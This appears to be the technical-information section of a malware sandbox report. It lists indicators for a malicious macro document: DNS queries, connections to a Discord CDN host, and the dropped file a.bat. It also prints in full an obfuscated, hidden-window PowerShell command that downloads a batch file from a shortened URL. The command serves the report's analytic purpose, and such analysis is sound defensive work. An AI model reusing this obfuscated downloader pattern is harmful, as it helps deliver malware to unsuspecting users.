Technical Information
- '<SYSTEM32>\cmd.exe' /c powershell -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invoke('http://re##and.ly/WdBPApoMACRO','a.bat')
- %HOMEPATH%\documents\a.bat
- 'cd#.##scordapp.com':443
- 'cd#.##scordapp.com':443
- DNS ASK re##and.ly
- DNS ASK cd#.##scordapp.com
- '<SYSTEM32>\cmd.exe' /c powershell -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invoke('http://re##and.ly/WdBPApoMACRO','a.bat')' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invoke('http://re##and.ly/WdBPApoMACRO','a.bat')